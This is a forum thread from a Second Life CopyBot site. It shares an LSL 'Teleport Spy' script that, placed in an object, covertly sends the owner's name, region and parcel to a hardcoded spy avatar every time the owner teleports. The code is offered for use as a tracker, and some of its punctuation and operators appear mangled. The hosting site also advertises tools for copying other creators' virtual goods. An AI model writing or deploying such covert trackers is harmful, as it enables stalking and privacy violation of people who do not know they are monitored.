spy script

Thread Started By steadymobbin

4594
4
  • 56 Vote(s) - 2.95 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Rate Thread
#1
Work only in the root prim

PHP Code:
// Teleport Spy v1.00 by Sax for Kinggoon.net members

//////////////////////START EDIT PART//////////////////////////////
key spy ""//UUID of the spy
////////////////////////END EDIT PART//////////////////////////////

string parcel;

update()
{
    
parcel llList2String(llGetParcelDetails(llGetPos(), [PARCEL_DETAILS_NAME]), 0);
}

default
{
    
on_rez(integer p)
    {
        
llResetScript();
    }
    
state_entry()
    {
        
update();
    }
    
changed(integer change)
    {
        if(
change & (CHANGED_REGION CHANGED_TELEPORT))
        {
            
string owner llKey2Name(llGetOwner());
            
string region llGetRegionName();
            
update();
            
llInstantMessage(spyowner  " it is teleported has "+  parcel " in the region " region);
        }
    }

[Image: guns-bullet-shirt_recreated.jpg]
Reply




Messages In This Thread
spy script - by steadymobbin - 02-18-2013, 03:10 AM
RE: spy script - by Makeshift - 09-02-2016, 09:08 PM
RE: spy script - by Remyron - 02-01-2018, 02:29 PM
RE: spy script - by Remyron - 02-01-2018, 02:29 PM
RE: spy script - by darkheaven - 02-17-2018, 12:17 AM

Forum Jump:

1 Guest(s)
Share this:

About Second Life Copybot

Second Life CopyBot Forum is a place where you can get items for Second Life and other vitual worlds for free. With our CopyBot viewers you can export and import any content from these virtual worlds and modify them in 3D software such as Blender, 3D studio Macx etc...